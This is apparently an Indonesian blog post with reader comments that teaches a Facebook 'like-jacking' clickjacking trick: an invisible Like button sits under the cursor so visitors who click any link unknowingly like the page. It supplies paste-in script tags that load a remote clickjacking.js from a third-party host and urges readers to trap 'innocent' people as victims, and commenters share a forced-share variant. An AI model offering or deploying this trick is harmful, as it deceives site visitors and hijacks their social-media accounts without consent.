Clickjacking adalah sebuah teknik yang digunakan untuk mengekploitasi web browser. Dengan menggunakan teknik ini, attacker bisa dengan mudah mengelabui user untuk meng-klik sebuah link atau komponen yang diinginkan si attacker di sebuah halaman web, tanpa sepengetahuan si user.
Clickjacking Like Facebook
Umumnya, metode yang digunakan dalam clickjacking ini adalah attacker menanam “jebakan” di sebuah link atau tombol yang kiranya akan di-klik oleh user. Jebakan tersebut biasanya adalah sebuah komponen yang sudah diatur sedemikian rupa, agar tidak nampak ketika dilihat oleh user, dan diletakkan di atas komponen link atau tombol. Sehingga ketika user ingin meng-klik link atau tombol tersebut, justru sebenarnya user telah meng-klik komponen jebakan tersebut. Setelah itu, terserah attacker, mau diarahkan ke situs-situs berbahaya, atau diarahkan untuk mendownload virus dan malware, si user telah jatuh ke jebakan attacker.
Facebook Clickjacking
Facebook clickjacking adalah teknik clickjacking yang ditujukan untuk menyerang pengguna facebook. Saya akan membahas tentang facebook clickjacking yang digunakan untuk me-LIKE secara otomatis sebuah halaman web, tanpa meng-klik tombol LIKE (yang biasanya disediakan oleh facebook), kita hanya perlu membuat user untuk meng-klik link apapun di halaman web yang berisi jebakan. Maka secara otomatis di profil user tersebut akan muncul entri bahwa user telah me-like halaman web jebakan.
Hal ini bisa dilakukan dengan meletakkan tombol like yang tidak kelihatan (sangat transparan) di bawah kursosr, tiap kali kursor meng-hover sebuah link. Jadi ketika user ingin meng-klik sebuah link, maka sebenarnya user akan meng-klik tombol like transparan kita.
Setelah menng-klik link (sebenarnya meng-klik tombol like kita), user akan me-like halaman tersebut di facebook, dan kemudian akan di-redirect ke lokasi link sesungguhnya. Dan cookie akan dibuat, sehingga setelah user terkena jebakan sekali, jebakan tersebut tidak akan muncul di halaman-halaman selanjutnya.
untuk gampangnya liat aja demonya di http://ngetesbos.7ruh.com/ dalam halaman demo ini tombol LIKEnya keliatan.
Membuat Halaman Web Berisi Jebakan Clickjacking
Untuk membuat halaman web yang berisi jebakan clickjacking ini sangat mudah sekali, Tambahkan baris berikut ini ke bagian <head></head> halaman web teman-teman:
[wp-like-locker]
<script src="http://code.jquery.com/jquery-1.5.js"></script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script> <script>window.DO_CLICKJACKING = 1</script> <script src="http://dhanee7ruh.googlecode.com/files/clickjacking.js"></script>
[/wp-like-locker]
Nah, pastikan langkah telah diikuti dengan benar, dan cobalah sendiri untuk meng-klik sembarang link di halaman jebakan. Atau undang orang lain yang tidak berdosa sebagai korban, suruh mereka mengklik sembarang link di halaman jebakan tersebut. Kemudian lihat di profile facebook mereka, entri like ke halaman teman-teman akan nongol di sana 
( trik ini hanya bisa mengenai pengunjung yang sedang dalam keadaan login facebook lo ya..)
sumber : http://tkp.7ruh.com/pvupn
keren nih scriptnya, tapi ini ada fungsi autodisable nya nggak, jadi setelah berapa detik, script ini gak berfungsi lagi, kasian kan sama yang nggak punya account facebook kalo nongol2 terus….
ini autodisable kalo udah like. silahkan aja liat demonya. http://ngetesbos.7ruh.com/
ini juga bagus lho boss http://taroz.us/demo.html untuk memaksa visitor ngeshare page kita. kalo gak share gak bisa lanjut.
keren2 thanks…..ntar tak cobain ah….hihihih…maksa dikit nggak papa kali ya…:D
di coba dulu
oia tar mampir di blog saya berfungsi ga ya like nya 
salam kenal